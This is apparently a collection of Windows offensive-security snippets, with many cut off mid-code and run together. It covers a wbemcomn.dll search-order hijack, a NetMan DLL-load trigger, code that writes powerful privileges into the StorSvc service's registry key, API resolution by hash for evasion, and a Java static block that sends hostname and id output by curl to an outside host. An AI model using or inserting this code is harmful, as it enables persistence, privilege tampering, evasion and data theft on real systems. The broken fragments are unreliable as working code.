
wbemcomn.dll hijack

wbemcomn.dll

wbemcomn.dll is normally found in C:\Windows\System32; however, several WMI-related processes run from (and with a working directory of) C:\Windows\System32\wbem. Because the loader searches the loading executable's own directory before System32 (and, with SafeDllSearchMode enabled, the current directory only after the system directories), a copy of wbemcomn.dll placed in System32\wbem can be picked up instead of the genuine one — a classic DLL search-order hijack. Note that writing to System32\wbem requires administrative rights, so this is a persistence / defense-evasion primitive that runs code in the context of the affected services rather than a privilege escalation; confirm the actual load path with Process Monitor before relying on it.

This DLL hijack appears to affect at least explorer.exe and the following services:

  • WMI
  • Windows Update
  • WMI Performance Adapter
  • WSL
Trigger NetMan to load wlanhlp.dll or wlanapi.dll in native C
/* https://itm4n.github.io/windows-server-netman-dll-hijacking/ */
#include <windows.h>
#include <netcon.h>
#include <stdio.h>
/* https://github.com/reactos/reactos/blob/master/sdk/lib/uuid/otherguids.c */
/* NOTE(review): DEFINE_GUID only emits storage for these GUIDs when INITGUID is
   defined before <windows.h>/<netcon.h> are included; otherwise it expands to an
   extern declaration and the link relies on uuid.lib (or the SDK headers) to
   supply the definitions. Add `#define INITGUID` above the includes if the
   build fails with unresolved GUID symbols. */
DEFINE_GUID(IID_INetConnectionManager, 0xC08956A2,0x1CD3,0x11D1,0xB1,0xC5,0x00,0x80,0x5F,0xC1,0x27,0x0E);
DEFINE_GUID(CLSID_ConnectionManager, 0xBA126AD1,0x2166,0x11D1,0xB1,0xD0,0x00,0x80,0x5F,0xC1,0x27,0x0E);
void go() {
asm_get_ntdll.c
/* tcc asm_get_ntdll.c */
#include <Windows.h>
#include <stdio.h>
void * get_ntdll() {
unsigned long long ret;
__asm__ (
"
Stuff
/* Overwrites the privileges for the service in the registry */
BOOL AddPrivilegeToStorSvc() {
HKEY hKey;
LONG lResult;
TCHAR * szValue = TEXT("SeTcbPrivilege\0SeLoadDriverPrivilege\0SeBackupPrivilege\0SeRestorePrivilege\0SeSystemEnvironmentPrivilege\0SeManageVolumePrivilege\0SeTakeOwnershipPrivilege\0SeDebugPrivilege\0SeAssignPrimaryTokenPrivilege\0\0");
// Open the key
lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\StorSvc"), 0, KEY_READ | KEY_SET_VALUE, &hKey);
using System;
using System.IO;
using System.Runtime.InteropServices;
class Program
{
// Values for PAGE_ constants can be found in the Windows SDK
const uint PAGE_EXECUTE_READ = 0x20;
const uint PAGE_EXECUTE_READWRITE = 0x40;
DJB2 Hash in assembly
.code
asm_hash PROC
push rbp
mov rbp, rsp
mov qword ptr [rbp - 28h], rdi
mov qword ptr [rbp - 30h], rsi
mov qword ptr [rbp - 10h], 1505h
mov rax, qword ptr [rbp - 28h]
mov qword ptr [rbp - 8h], rcx
#include <stdio.h>
#include <Windows.h>
// pe_get_function_by_hash function: takes a pointer to a DLL mapped to memory, and a djb2 hash value of a function.
// It then searches the DLL's export table, hashing the value of the strings in the table, and then returns
// the address to that function.
PVOID pe_get_function_by_hash(PVOID dll, ULONG hashValue)
{
using System;
class Program {
public enum test : int {
SCRIPT = 0x00000001,
ACCOUNTDISABLE = 0x00000002,
HOMEDIR_REQUIRED = 0x00000008,
LOCKOUT = 0x00000010,
PASSWD_NOTREQD = 0x00000020,
PASSWD_CANT_CHANGE = 0x00000040,
Exec
public class Exec {
static {
try {
boolean isWindows = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (isWindows) {
String[] cmd = {"cmd.exe", "/C", "nslookup triggered-rce.windows.v1x.us"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
} else {
String[] cmd = {"bash", "-c", "(hostname && echo && id) | curl http://results.v1x.us -d '@-'"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();